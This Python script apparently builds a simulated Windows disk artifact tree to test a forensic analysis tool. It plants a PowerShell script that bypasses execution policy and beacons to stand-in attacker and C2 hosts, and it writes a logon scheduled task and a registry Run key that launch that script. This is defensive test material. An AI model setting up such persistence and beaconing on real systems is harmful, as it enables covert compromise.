#!/usr/bin/env python3
from __future__ import annotations

from pathlib import Path
import argparse
import json
import sqlite3


SUSPICIOUS_URLS = [
    "https://cdn-delivery.example/invoice_update.zip",
    "https://malware.example/backdoor.exe",
    "https://attacker.example/c2-beacon",
]


def write_text(path: Path, text: str, encoding: str = "utf-8") -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text, encoding=encoding)


def create_browser_history(path: Path) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    if path.exists():
        path.unlink()
    connection = sqlite3.connect(path)
    try:
        connection.execute("CREATE TABLE urls (url TEXT, title TEXT, visit_count INTEGER, last_visit_time INTEGER)")
        connection.execute("CREATE TABLE downloads (target_path TEXT, tab_url TEXT, start_time INTEGER)")
        for index, url in enumerate(SUSPICIOUS_URLS, start=1):
            connection.execute(
                "INSERT INTO urls VALUES (?, ?, ?, ?)",
                (url, f"CaseTrace demo URL {index}", 1, 13370000000000000 + index),
            )
        connection.execute(
            "INSERT INTO downloads VALUES (?, ?, ?)",
            (
                r"C:\Users\Analyst\Downloads\invoice_update.zip",
                SUSPICIOUS_URLS[0],
                13370000000000010,
            ),
        )
        connection.commit()
    finally:
        connection.close()


def create_artifact_tree(case_dir: Path) -> dict[str, object]:
    disk_root = case_dir / "disk_root"
    script_path = disk_root / "Users" / "Analyst" / "AppData" / "Roaming" / "Microsoft" / "Windows" / "Themes" / "update.ps1"
    write_text(
        script_path,
        "\n".join(
            [
                "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force",
                "$urls = @('http://attacker.example/payload', 'http://c2.example/beacon')",
                "foreach ($url in $urls) { try { Invoke-WebRequest -Uri $url -UseBasicParsing } catch { } }",
                "",
            ]
        ),
    )

    create_browser_history(
        disk_root
        / "Users"
        / "Analyst"
        / "AppData"
        / "Local"
        / "Google"
        / "Chrome"
        / "User Data"
        / "Default"
        / "History"
    )

    write_text(disk_root / "Windows" / "Prefetch" / "POWERSHELL.EXE-12345678.pf", "prefetch placeholder\n")
    write_text(disk_root / "Users" / "Analyst" / "Downloads" / "invoice_update.zip", "downloaded payload placeholder\n")
    write_text(disk_root / "Users" / "Analyst" / "Downloads" / "malicious_script.ps1", "powershell http://attacker.example/payload\n")
    write_text(disk_root / "Users" / "Analyst" / "AppData" / "Local" / "Temp" / "payload.exe", "http://c2.example/beacon\n")
    write_text(disk_root / "Windows" / "Temp" / "delivery.txt", "cdn-delivery.example/invoice_update.zip\n")

    task_xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\ThemeUpdater</URI></RegistrationInfo>
  <Triggers><LogonTrigger /></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File C:\\Users\\Analyst\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\update.ps1</Arguments>
    </Exec>
  </Actions>
</Task>
"""
    write_text(disk_root / "Windows" / "System32" / "Tasks" / "ThemeUpdater", task_xml, encoding="utf-16")

    reg_export = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ThemeUpdater"="powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\Analyst\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\update.ps1"
'''
    write_text(disk_root / "Users" / "Analyst" / "NTUSER_autoruns.reg", reg_export)

    amcache_export = r"""
Name: powershell.exe
Path: C:\Users\Analyst\AppData\Roaming\Microsoft\Windows\Themes\update.ps1
SHA1: deadc0de00112233445566778899aabbccddeeff
"""
    write_text(disk_root / "Windows" / "AppCompat" / "Programs" / "Amcache.txt", amcache_export)

    security_xml = """
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID></System>
  <EventData>
    <Data Name="TargetUserName">Analyst</Data>
    <Data Name="LogonType">2</Data>
    <Data Name="IpAddress">127.0.0.1</Data>
  </EventData>
</Event>
"""
    write_text(disk_root / "Windows" / "System32" / "winevt" / "Logs" / "Security.xml", security_xml)

    expected = {
        "case_id": "realistic-windows-case",
        "analyst": "CaseTrace Demo",
        "created": "2026-04-22",
        "source": "Controlled artifact-tree demo generated by scripts/create_realistic_artifact_tree.py",
        "format": "mounted_directory_artifact_tree",
        "expected_artifacts": [
            "timeline_mft",
            "registry_autoruns",
            "scheduled_tasks",
            "prefetch_summary",
            "amcache_summary",
            "browser_history",
            "user_logons",
            "yara_scan",
        ],
        "planted_artifacts": [
            {"name": "PowerShell script", "path": r"C:\Users\Analyst\AppData\Roaming\Microsoft\Windows\Themes\update.ps1"},
            {"name": "Scheduled task", "path": r"C:\Windows\System32\Tasks\ThemeUpdater"},
            {"name": "Registry autorun export", "path": r"C:\Users\Analyst\NTUSER_autoruns.reg"},
            {"name": "Browser history", "path": r"C:\Users\Analyst\AppData\Local\Google\Chrome\User Data\Default\History"},
            {"name": "Prefetch marker", "path": r"C:\Windows\Prefetch\POWERSHELL.EXE-12345678.pf"},
            {"name": "Amcache text export", "path": r"C:\Windows\AppCompat\Programs\Amcache.txt"},
            {"name": "Security logon XML", "path": r"C:\Windows\System32\winevt\Logs\Security.xml"},
            {"name": "Downloaded file", "path": r"C:\Users\Analyst\Downloads\invoice_update.zip"},
        ],
        "notes": "This is a reproducible artifact-tree smoke case, not a full forensic disk image.",
    }
    write_text(case_dir / "manifest.json", json.dumps(expected, indent=2, sort_keys=True) + "\n")
    run_script = f"""#!/bin/bash
set -e

RUN_OUTPUT="${{RUN_OUTPUT:-runs/realistic-windows-case-final}}"

python3 -m findevil analyze \\
  --case {case_dir.as_posix()} \\
  --disk {case_dir.as_posix()}/disk_root \\
  --profile windows \\
  --max-iterations 3 \\
  --output "$RUN_OUTPUT" \\
  --tool-backend sift-ssh \\
  --remote-host 127.0.0.1 \\
  --remote-port 2222 \\
  --remote-user sift \\
  --remote-workdir /home/sift/findevil \\
  --remote-disk-path /home/sift/findevil/{case_dir.as_posix()}/disk_root \\
  --remote-identity-file vm_assets/ssh/sift_vm_ed25519 \\
  --remote-insecure-no-host-key-check \\
  --remote-timeout-sec 180
"""
    run_path = case_dir / "run_analysis.sh"
    write_text(run_path, run_script)
    run_path.chmod(0o755)
    return expected


def main() -> int:
    parser = argparse.ArgumentParser(description="Create a controlled Windows-like artifact tree for CaseTrace smoke demos.")
    parser.add_argument("--case-dir", default="cases/realistic-windows-case")
    args = parser.parse_args()
    case_dir = Path(args.case_dir)
    manifest = create_artifact_tree(case_dir)
    print(json.dumps({"case_dir": str(case_dir), "manifest": manifest}, indent=2))
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
